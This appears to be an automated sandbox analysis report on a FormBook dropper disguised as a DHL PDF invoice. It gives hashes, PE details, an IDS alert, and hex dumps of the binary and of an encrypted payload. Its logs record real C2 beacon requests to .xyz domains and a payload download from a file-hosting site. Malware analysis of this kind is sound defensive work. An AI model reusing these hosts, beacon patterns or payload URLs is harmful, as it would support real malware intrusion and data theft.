Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21e8e2b95c\System.Xml.ni.dll",0..

C:\Users\user\AppData\Local\Temp\DHL_119040 Belegdokument,pdf.exe


File Type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows

Category: dropped

Size (bytes): 59392

Entropy (8bit): 5.625513347071076

Encrypted: false

SSDEEP: 768:RN6aur1k6IwVlj7ceKguXgcKmxDERgXl+28Be7:D6zrRVcn7X4mJYtBe7

MD5: D64F5D6117D03DFB20CFA1555D0F4BD8

SHA1: 1EED6AD06BABB331A39B711A8F8C69902A2F4600

SHA-256: CA08A2E70DAC67086919A22C1B4BDF3F0F2578CB446CA74C8E599F71D0849E55

SHA-512: 6DE1A2C97823DC026B0008FD6BB648D617AE92EF062483F81960717CC4C82EFAADC214824D16AD18180C5EAE6150A51CFAADE227EFC6D584C640C1C6C8588210

Malicious: true

Antivirus: Antivirus: Joe Sandbox ML, Detection: 100%Antivirus: ReversingLabs, Detection: 59%

Reputation: low

Dropped Files

Created / dropped Files




































Static File Info

GeneralFile type: PE32 executable (GUI) Intel 80386 Mono/.Net assemb

ly, for MS Windows

Entropy (8bit): 5.625513347071076

TrID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%Win32 Executable (generic) a (10002005/4) 49.78%Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%Generic Win/DOS Executable (2004/3) 0.01%DOS Executable Generic (2002/1) 0.01%

File name: DHL_119040 Belegdokument,pdf.exe

File size: 59392

MD5: d64f5d6117d03dfb20cfa1555d0f4bd8

SHA1: 1eed6ad06babb331a39b711a8f8c69902a2f4600

SHA256: ca08a2e70dac67086919a22c1b4bdf3f0f2578cb446ca74c8e599f71d0849e55

SHA512: 6de1a2c97823dc026b0008fd6bb648d617ae92ef062483f81960717cc4c82efaadc214824d16ad18180c5eae6150a51cfaade227efc6d584c640c1c6c8588210

SSDEEP: 768:RN6aur1k6IwVlj7ceKguXgcKmxDERgXl+28Be7:D6zrRVcn7X4mJYtBe7

File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...tgra.............................7... ...@....@.. .......................@............@................................

File Icon

Icon Hash: b8b1f1ecccce9a9a

Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...tgra.............................7... ...@....@.. .......................@[email protected][email protected].................... ....................................................... ............... ..H............text........ ...................... ..`.rsrc...L....@......................@[email protected]....... [email protected]%...............$...............................................0.............-.&(....+.&+.*....0..........s....(....t.....-.&+......+.*....~....*..0.............-.&(....+.&+.*....0..E.........(....s....r...p(....o.....-.&&..{....(.....-.&&..}....+.}....+.&.*...........@A....... ....*..0..O.......~....%-.&~..........s....%.-.&+......+.s.....-.&..(....+.&.. .'...-.&+.(....+.*.........99.......0..2.........-.&+..+..{....(.....-.&...+.&....( ...,.s!...z.*..............

C:\Users\user\AppData\Local\Temp\DHL_119040 Belegdokument,pdf.exe

C:\Users\user\AppData\Local\Temp\DHL_119040 Belegdokument,pdf.exe:Zone.Identifier


File Type: ASCII text, with CRLF line terminators

Category: dropped

Size (bytes): 26

Entropy (8bit): 3.95006375643621

Encrypted: false

SSDEEP: 3:ggPYV:rPYV

MD5: 187F488E27DB4AF347237FE461A079AD

SHA1: 6693BA299EC1881249D59262276A0D2CB21F8E64

SHA-256: 255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309

SHA-512: 89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E

Malicious: true

Reputation: high, very likely benign file

Preview:[ZoneTransfer]....ZoneId=0

GeneralEntrypoint: 0x4037c2

Entrypoint Section: .text

Digitally signed: false

Static PE Info


Snort IDS Alerts

Network Port Distribution

Imagebase: 0x400000

Subsystem: windows gui

Image File Characteristics: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED

DLL Characteristics: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Time Stamp: 0x61726774 [Fri Oct 22 07:25:40 2021 UTC]

TLS Callbacks:

CLR (.Net) Version: v4.0.30319

OS Version Major: 4

OS Version Minor: 0

File Version Major: 4

File Version Minor: 0

Subsystem Version Major: 4

Subsystem Version Minor: 0

Import Hash: f34d5f2d4577ed6d9ceec516c1f5a744

General

Name Virtual Address Virtual Size Raw Size Xored PE ZLIB Complexity File Type Entropy Characteristics

.text 0x2000 0x17c8 0x1800 False 0.551432291667 data 5.56997844697 IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

.rsrc 0x4000 0xcb4c 0xcc00 False 0.376627604167 data 5.50267990313 IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

.reloc 0x12000 0xc 0x200 False 0.044921875 data 0.0815394123432 IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Network Behavior

Timestamp Protocol SID MessageSourcePort

DestPort Source IP Dest IP

10/23/21-08:01:11.125549

TCP 2031453 ET TROJAN FormBook CnC Checkin (GET) 49827 80 192.168.2.4 185.61.153.97

10/23/21-08:01:11.125549


10/23/21-08:01:11.125549


Timestamp Source IP Dest IP Trans ID OP Code Name Type Class

Oct 23, 2021 07:59:17.188330889 CEST 192.168.2.4 8.8.8.8 0x672d Standard query (0)

store2.gofile.io A (IP address) IN (0x0001)

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

TCP Packets

UDP Packets

DNS Queries


Oct 23, 2021 08:01:11.056823015 CEST 192.168.2.4 8.8.8.8 0xbc05 Standard query (0)


A (IP address) IN (0x0001)

Oct 23, 2021 08:01:16.253077030 CEST 192.168.2.4 8.8.8.8 0x30aa Standard query (0)

www.mgav64.xyz A (IP address) IN (0x0001)

Timestamp Source IP Dest IP Trans ID OP Code Name Type Class

Timestamp Source IP Dest IP Trans ID Reply Code Name CName Address Type Class

Oct 23, 2021 07:59:17.206615925 CEST

8.8.8.8 192.168.2.4 0x672d No error (0) store2.gofile.io 31.14.69.10 A (IP address) IN (0x0001)

Oct 23, 2021 08:01:11.078823090 CEST

8.8.8.8 192.168.2.4 0xbc05 No error (0) www.dum-directory.xyz

dum-directory.xyz

CNAME (Canonical name)

IN (0x0001)

Oct 23, 2021 08:01:11.078823090 CEST

8.8.8.8 192.168.2.4 0xbc05 No error (0) dum-directory.xyz

185.61.153.97 A (IP address) IN (0x0001)

Oct 23, 2021 08:01:16.275343895 CEST

8.8.8.8 192.168.2.4 0x30aa No error (0) www.mgav64.xyz 45.128.51.66 A (IP address) IN (0x0001)

store2.gofile.io


www.mgav64.xyz

Session ID Source IP Source Port Destination IP Destination Port Process

0 192.168.2.4 49744 31.14.69.10 443 C:\Users\user\Desktop\DHL_119040 Belegdokument,pdf.exe

TimestampkBytestransferred Direction Data


1 192.168.2.4 49827 185.61.153.97 80 C:\Windows\explorer.exe


Oct 23, 2021 08:01:11.125549078 CEST

8142 OUT GET /g8ne/?0ZLHJp=6lSXudxxcV7&o8=Be1BkZdm/b74i0YWP7XpwSWQHcg9iNWnmOI4W4K/WqRplCCnW4pXGNgZl6BGAVN7TmUU HTTP/1.1Host: www.dum-directory.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

DNS Answers

HTTP Request Dependency Graph

HTTP Packets


Oct 23, 2021 08:01:11.167180061 CEST

8143 IN HTTP/1.1 301 Moved Permanentlykeep-alive: timeout=5, max=100content-type: text/htmlcontent-length: 707date: Sat, 23 Oct 2021 06:01:11 GMTserver: LiteSpeedlocation: https://www.dum-directory.xyz/g8ne/?0ZLHJp=6lSXudxxcV7&o8=Be1BkZdm/b74i0YWP7XpwSWQHcg9iNWnmOI4W4K/WqRplCCnW4pXGNgZl6BGAVN7TmUUx-turbo-charged-by: LiteSpeedconnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 33 30 31 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 62 65 65 6e 20 70 65 72 6d 61 6e 65 6e 74 6c 79 20 6d 6f 76 65 64 2e 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>



2 192.168.2.4 49831 45.128.51.66 80 C:\Windows\explorer.exe


Oct 23, 2021 08:01:16.449506044 CEST

8156 OUT GET /g8ne/?o8=rnkuRRn/rDv8NTV3FtNLyCXfnvLi7ceXtX+o2xpYl1BMkG6FqtPBI56RFFP4K6xrAuiU&0ZLHJp=6lSXudxxcV7 HTTP/1.1Host: www.mgav64.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Oct 23, 2021 08:01:16.622426987 CEST

8156 IN HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 23 Oct 2021 06:01:16 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


0 192.168.2.4 49744 31.14.69.10 443 C:\Users\user\Desktop\DHL_119040 Belegdokument,pdf.exe


2021-10-23 05:59:17 UTC 0 OUT GET /download/d608af7b-4e99-4d57-8e3d-a6c55d6bc65d/Ilemlfctnrlgmidykbo.jpeg HTTP/1.1Host: store2.gofile.ioConnection: Keep-Alive

HTTPS Proxied Packets


2021-10-23 05:59:17 UTC 0 IN HTTP/1.1 200 OKAccept-Ranges: bytesAccess-Control-Allow-Origin: *Content-Disposition: attachment; filename="Ilemlfctnrlgmidykbo.jpeg"Content-Length: 307208Content-Type: image/jpegDate: Sat, 23 Oct 2021 05:59:17 GMTStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadX-Content-Type-Options: nosniffX-Frame-Options: SAMEORIGINX-Powered-By: ExpressX-Xss-Protection: 1; mode=blockConnection: close

2021-10-23 05:59:17 UTC 0 IN Data Raw: 54 b7 7b 0b ad 76 e2 86 72 a8 cc e0 bc 86 7b 0e 59 67 84 32 33 4b ac ff 0b 2e 00 69 15 05 89 90 b0 95 91 7b 7f 3f 1b bb b0 95 91 7b 7f 3f 1b bb b0 95 91 7b 7f 3f 1b bb e2 73 64 c2 25 38 2a b1 9f 8e 05 f7 38 62 96 15 7f ac 34 c1 8a 02 6e 0f 45 83 ad a0 09 c9 c7 35 fb 41 f0 b0 e7 5c f3 da f5 07 3a 72 e6 c2 87 89 a2 b4 ba 51 85 b1 ff 1a 86 51 6b d1 b2 0a d0 a2 4f 4f 8f 10 62 5c ff db 54 f4 f2 52 01 32 33 52 d7 0f 58 22 f3 9f bc a5 a7 7e b7 bd 3e 2c 74 66 99 b0 71 c4 3d 6f d2 96 4b 95 dc d7 52 36 03 9d 7f 75 9a 0f 34 4a 14 df 8e 9f cc ef e7 bc 38 b0 63 39 8c 64 e9 5e be 08 46 7c 39 30 f8 7f 9c 89 46 7c 39 30 f8 7f 9c 89 7f 20 16 62 a1 53 09 2f bc c2 4d a2 d9 4a 50 2f 52 e6 ae 02 e9 0e 7c 33 52 e6 ae 02 e9 0e 7c 33 a9 11 9e d0 00 d1 fc 2e b0 95 91 7b 7f 3f 1b Data Ascii: T{vr{Yg23K.i{?{?{?sd%8*8b4nE5A\:rQQkOOb\TR23RX"~>,tfq=oKR6u4J8c9d^F|90F|90 bS/MJP/R|3R|3.{?

2021-10-23 05:59:17 UTC 1 IN Data Raw: 2f c1 26 54 6d d7 46 97 8a 53 be f9 db 1f 0c 3f 6d a7 7d c4 ca 43 e4 76 28 29 a9 f6 9e 32 cd 9d 17 88 b5 6d 16 c2 40 d5 c2 ec ad 15 47 dc f4 e3 9f b4 15 69 5b 8d 00 8b ef 6d f5 07 f4 de cf c7 c4 b0 a2 3b 00 97 c3 89 0e ff 00 f9 39 12 6f 25 3e 64 c4 bf 94 62 34 0f 1e 1f a8 ca 20 8f 28 86 f7 d2 2a af 40 99 62 39 67 0d 5b af ad 46 9e 70 28 29 1e 72 9e 62 da eb 45 07 53 c6 43 0a 7c 60 95 e4 50 73 11 50 6a ba 2c a6 2a 1f ec 1f ac e8 10 e2 50 2a c6 d1 b3 a0 f0 14 8b bc 4f 86 1e 63 a0 4f cf 20 18 2d 64 2d 7d 87 16 bf 6e ee c5 8e e7 d1 0a fc c3 1d 0b ee 18 18 0e 10 9f 05 9e f7 ff fd 51 a5 ab 73 18 78 52 a3 2e 12 b7 60 5a dc 6b f8 3a e8 c5 f4 36 a0 76 0c ec 2f 5a 86 65 3c b1 92 7f 3e 9c 26 35 0e b3 15 8c 49 a0 19 21 83 66 01 b8 cb bf 89 b8 83 f1 c9 fa d5 ab 92 ac Data Ascii: /&TmFS?m}Cv()2m@Gi[m;9o%>db4 (*@b9g[Fp()rbESC|`PsPj,*P*OcO -d-}nQsxR.`Zk:6v/Ze<>&5I!f

2021-10-23 05:59:17 UTC 3 IN Data Raw: 43 74 e3 c9 ee 30 8d aa 43 d9 be 95 b2 a7 9f be 73 7d 90 b1 9e 80 7f ce 17 e8 6a fb 21 90 9e 78 7c d6 45 60 8f45 12 ae 92 01 fa f2 05 02 78 11 0a a2 62 69 ac d2 37 fd b8 61 5d d8 40 75 aa 35 77 1b f5 94 66 18 26 6e 3b fd 5f 83 fe 5ea6 01 4e 8d f1 cc 64 23 19 f5 60 05 97 56 09 a8 93 d7 19 ca 49 d5 b6 eb 29 4e b5 ec a1 dd 61 66 7e 9b 55 d4 d5 1d ef 51 72 6b 07 cb 4c cd bf b0 7d 78 31 f6 97 ad 65 86 93 be c9 af a8 55 52 c2 17 54 de 5e d0 48 2e 0a 4d b2 be 34 dd a6 16 90 f4 21 ca 8d 6e c5 39 eb 72 d7 3b ce 03 5d d4 ec 57 2d 5f a5 f1 6f d5 5a a1 d0 00 a9 aa ac 16 a5 1b b0 47 64 f4 e0 d3 45 db 37 af cd 5d e4 52 42 8b d5 04 d6 29 27 d5 04 cc 16 51 20 dd 71 0d 41 59 6a e3 ae 92 5d be b8 b5 6e 00 e4 3a 01 e7 34 b4 74 c5 7c 5c 47 0a 76 5e b0 d7 c4 c0 88 12 54 e0 Data Ascii: Ct0Cs}j!x|E`Exbi7a]@u5wf&n;_^Nd#`VI)Naf~UQrkL}x1eURT^H.M4!n9r;]W-_oZGdE7]RB)'Q qAYj]n:4t|\Gv^T

2021-10-23 05:59:17 UTC 4 IN Data Raw: ea 64 70 fc c5 3c 53 70 da 60 63 e4 8a c0 91 a2 8b 68 7d 89 71 a9 3b 00 f5 94 66 18 26 6e 3b fd ba 46 3d 6f 75eb 63 2f b8 1c 94 f4 6f c5 ad 30 13 60 08 36 2f a7 fa 63 61 11 53 2c 5b 37 ea 54 e7 8a 79 e1 fd e2 e8 bd 6b 7c 8c eb f5 dc ee 21 ba b7 d7 2e 93 74 b2 ca 7b 11 06 4b 1e 1f 88 86 48 6a 5b 31 78 a7 fb c0 b9 b8 2a 2b 18 7b b7 11 78 de ca 9d 47 ad 67 70 87 9e 98 13 e9 14 b8 06 f9 42 e4 f4 c9 27 12 71 e1 30 f9 57 67 58 95 af a7 19 5f 50 4c df 85 6a ba 4b a0 0c c7 32 99 b9 b3 8a 30 04 5f 45 b7 c0 99 c1 37 4b 7a 90 96 8b b5 54 8c 0d 41 74 3c 32 34 4d c4 de 85 1e 31 b1 c7 55 88 d5 ac 0c 60 c7 85 60 e9 b4 1d fc 07 90 33 79 70 1e 99 ba d8 7b f1 89 a5 de 04 2c 66 62 4e c6 17 f0 70 cc 99 f6 ad 67 59 be 03 87 f1 99 1e 19 cc be ca c6 a4 4e 4c ec 73 65 c3 a1 bc Data Ascii: dp<Sp`ch}q;f&n;F=ouc/o0`6/caS,[7Tyk|!.t{KHj[1x*+{xGgpB'q0WgX_PLjK20_E7KzTAt<24M1U``3yp{,fbNpgYNLse

2021-10-23 05:59:17 UTC 8 IN Data Raw: 1d 8f 34 88 39 81 19 a8 07 f5 1d 22 23 6f c6 c2 7f c3 2c 19 c1 54 da 93 60 f4 ae e0 f3 1d 34 4c 40 a0 0c 45 bc 1e 31 f2 5f c7 be bf 63 e9 d1 7c 7e b0 a9 ee 52 98 75 d3 da d3 2d 97 ee 4d 7b d6 87 ef 8c cc 54 da 01 35 f7 90 2c d5 c6 99 5c 40 84 55 43 37 95 f2 f4 59 02 c6 8e 2a ed 05 8f 8d b9 68 6b 0c 95 6c fc c3 30 0a 1c ac 7d c8 79 2b fb e8 ee c3 24 4df9 a8 89 64 98 b2 6f b8 9b 25 b6 4b 46 5b 14 d4 e0 48 de 72 cf 34 98 2e 3b 24 51 bf f8 d7 23 8e 2d 06 2d ba e4 60 f2 e0 61 c4 37 62 a8 d7 d2 70 ea de 14 bd ea 3e 2f a9 e5 4b 63 be 9d 28 67 e3 16 db 89 91 ca 05 22 5d 53 7c e7 2e d6 0c 13 1c54 0e ee 92 c8 4c fd 71 05 71 87 2f 50 c8 c7 41 69 bb c8 c4 ce 3e 14 0e 11 1a 08 5e 56 7c 28 8d 62 89 cf e6 1e e5 52 78 e0 27 f4 30 f7 64 d7 e9 1b aa ec e2 47 63 97 8c 18 Data Ascii: 49"#o,T`4L@E1_c|~Ru-M{T5,\@UC7Y*hkl0}y+$Mdo%KF[Hr4.;$Q#--`a7bp>/Kc(g"]S|.TLqq/PAi>^V|(bRx'0dGc

2021-10-23 05:59:17 UTC 11 IN Data Raw: ef 28 32 35 7d aa 78 e3 3f 6c 27 6b 78 21 19 27 51 ad 89 f4 d5 72 67 c6 0d 78 60 32 92 96 b7 4b 8a 1a fd fa 19 71 44 dd 34 f9 51 ba e2 05 14 77 22 9e c1 44 5c 74 3e d6 0b 1d 1a 25 c1 02 87 34 94 53 3c d4 5a 59 b8 5c d1 f3 0c dd d6 e1 0f 83 f6 2a 9f c8 fc 54 a8 9a 93 ab 75 d2 52 82 5e b0 96 64 89 87 c7 4b 38 2d 8b e1 a2 4c 17 02 06 57 32 80 52 1b 1a ab 3e 77 6e 97 6f 7b 11 71 be b7 84 ac 49 53 14 e6 80 68 87 fb 85 78 17 2f c5 78 04 1f c2 d9 c7 4b 38 2d 8b e1 a2 4c 23 ab 2d 2b 6e 0f f2 3f 06 99 c4 5e f8 9e d7 8e b8 cc 5b 63 fd 9b 53 b5 ce c3 88 a6 58 78 ea 96 28 2e 01 2a 40 98 53 05 55 fd f7 98 c2 4c 6c 2d 0f fe 0f f7 8b f9 58 6b af b6 49 21 07 4d a8 45 03 22 0a b1 9f 6f 70 b6 be 18 d1 e4 f5 94 0f 3f 73 f7 88 cf 84 23 97 41 ec 47 8a 89 9a 3c 15 8d 47 53 1f Data Ascii: (25}x?l'kx!'Qrgx`2KqD4Qw"D\t>%4S<ZY\*TuR^dK8-LW2R>wno{qIShx/xK8-L#-+n?^[cSXx(.*@SULl-XkI!ME"op?s#AG<GS

2021-10-23 05:59:17 UTC 18 IN Data Raw: 89 06 9b 5b f1 8d 56 25 e0 5f 6d eb c4 97 21 b2 86 b4 d7 d3 04 60 f0 d0 26 61 46 6f 33 f4 5a 0f 41 70 f4 73 01 46 96 f0 ce b2 25 91 a3 c5 bf 91 40 25 b6 68 dc 42 6b 51 07 1c fe cb 52 ed 08 64 0d 66 73 5e 4e d8 ae ec 23 7e bb e1 49 71 7c b0 c8 fc 8f 11 0b 0a ee 67 43 df 2b 2d 2a a3 b2 e1 78 7c 60 ec b4 39 f4 bd ed ee ae 90 f5 7c 4d 11 e6 da 01 b3 f6 9c 45 5e d6 cb f7 68 e6 a8 df 3c f1 f9 84 52 61 da 08 a3 1f 61 e4 39 c5 c4 3e 9d 4a 35 77 67 63 1c f1 b5 06 23 ed 5e f3 f3 16 d3 72 0c 63 13 cb c9 01 97 8e f6 47 02 a6 82 7a 36 80 70 ee 4f 22 7d 9a e7 eb 1e 30 48 82 fc 20 48 52 23 cb c0 de de 4a e0 f6 fb cb 1c bb cd 9d 19 1b 76 cc 2c a7 b2 c2 f6 10 97 6d 4f b4 7c f8 58 87 15 eb 33 08 9a ef 92 a0 98 ce 68 59 30 4d 5a 89 0c a9 31 f9 53 14 c8 55 d3 1b 4d cf 60 78 Data Ascii: [V%_m!`&aFo3ZApsF%@%hBkQRdfs^N#~Iq|gC+-*x|`9|ME^h<Raa9>J5wgc#^rcGz6pO"}0H HR#Jv,mO|X3hY0MZ1SUM`x

2021-10-23 05:59:17 UTC 26 IN Data Raw: f4 40 02 23 37 07 a6 f1 16 34 36 c0 b0 4c 51 d2 4d 5d ab 00 82 00 2f 48 cc eb 53 27 3d ff 5e 66 e4 10 71 c4 73 65 30 d1 db d3 87 71 1c d9 10 ec c9 98 df b1 6e 2d 2b 87 bc 9a 59 3f 2e 1f 19 d4 8c 72 61 25 9d 69 d3 47 01 a3 53 8b 9c 75 62 ee 96 76 55 02 4f 2a a0 a9 21 37 6d 59 2f a8 78 9c 16 5a ff 12 71 e0 61 18 a9 35 ef f2 a6 77 30 cb aa f4 3a 37 e8 2f 7b 54 69 02 80 70 b0 92 89 d5 02 42 09 b8 19 bd a4 63 5d 79 f3 bc 1c f1 1f 0e 4b 79 b8 02 a1 ee 29 1e ac db 03 72 52 fa 7a 57 07 da 1e bc a2 b3 47 11 5c e9 72 0d bc 99 7e aa 5e 23 a3 7c 54 f0 b6 28 60 dc af 09 26 a3 90 96 4a 4f c1 aa f9 d6 51 a6 46 6b 04 14 1e 89 e7 b9 ab 5c 6b 6d f0 0c 1b c8 c2 e7 55 07 66 20 e0 6a 82 ca 92 08 b6 20 72 8a 32 4f 36 1f 98 9a 0a 34 a7 f3 b1 da f0 ce 6c f6 58 ef 3d cd ab 29 43 Data Ascii: @#746LQM]/HS'=^fqse0qn-+Y?.ra%iGSubvUO*!7mY/xZqa5w0:7/{TipBc]yKy)rRzWG\r~^#|T(`&JOQFk\kmUf j r2O64lX=)C



2021-10-23 05:59:17 UTC 35 IN Data Raw: 42 5a 36 82 dc 7e 27 73 f0 e8 1f 4e d0 fc fb ff 85 4f 7d ec 3a 57 d1 69 33 dd 19 a3 74 bc 7f 67 bd bb c1 e8 a3 6b a2 ae 5a 3d 43 27 04 b7 51 04 04 e5 89 ec e8 b7 f0 a1 98 35 e1 80 06 94 cd fc 2e 47 70 92 bf 9f d0 98 38 27 c1 e8 a3 6b a2 ae 5a 3d 3e 6f 4f a3 bc ae 59 eb 13 c8 37 db 65 33 aa 3b fb 75 d8 e9 6a c6 ef 36 e9 34 bf ba 36 60 34 b0 76 da 4a 5e 05 ab fb 2d bf 24 54 51 64 d9 58 1d a7 e7 a8 c7 91 cf c2 1c 97 e3 25 fd 35 3b 70 0e 79 bd 0a c0 d2 e6 a1 0c 52 f3 c8 6a 71 06 1a 1e 66 25 d3 9d 87 fd a2 65 75 ea 90 bb a8 2c 05 b1 4b 40 e4 bb 87 c3 17 7a 9a cb 3e c5 03 dc 7f 68 31 4f 59 54 50 f9 82 fc 30 31 7c 19 f1 a1 39 6c 8a 53 63 5a 66 bd 40 80 1d 43 a1 17 af 9a 4d b5 7b d1 7e 7c e2 dc 5b b4 de 5b 40 58 d4 11 41 b7 71 64 58 b8 da 58 e0 f2 28 9f 66 bf 4f Data Ascii: BZ6~'sNO}:Wi3tgkZ=C'Q5.Gp8'kZ=>oOY7e3;uj646`4vJ^-$TQdX%5;pyRjqf%eu,K@z>h1OYTP01|9lScZf@CM{~|[[@XAqdXX(fO

2021-10-23 05:59:17 UTC 43 IN Data Raw: 22 1c 98 e9 77 75 59 f3 3b 09 47 9d c6 ca b5 bc 8a 44 83 bd 93 c1 bd 4c a4 1d b9 62 cc a3 d6 07 c5 8a 04 9a 50 fd fe f5 9d d0 4e d0 30 5d a0 d4 7a 97 2a 4a 0b 6c 93 94 7a c5 1c a7 b8 91 62 fb 58 2c 08 f0 23 5f 8f c8 2b 92 f3 dd 69 4a 8b 36 00 b6 47 65 62 b3 c8 d9 73 00 ce 28 76 00 d2 80 c0 e2 35 1c b7 fd 77 42 6e 40 b8 d8 1a 6a 9f a5 80 59 88 af 50 5b c4 51 43 88 18 33 24 fa d6 64 c4 f5 54 0a fb ff ee 39 66 dd 4f 77 4a 93 c7 70 97 ce 37 c2 6d 0c 0e f9 eb 6c 0c 00 4d 2f 69 f8 51 97 80 59 8d b5 9c 6d 90 4b 28 20 e9 b9 45 d5 57 d0 cf e9 55 a2 2d 9a e2 d2 fe e7 13 d2 57 81 c3 df 20 a1 7d a1 aa 6c 93 df b5 46 a9 09 ac 17 50 6d 9e 45 2c 20 07 61 e5 b3 76 4f 44 a0 4f 02 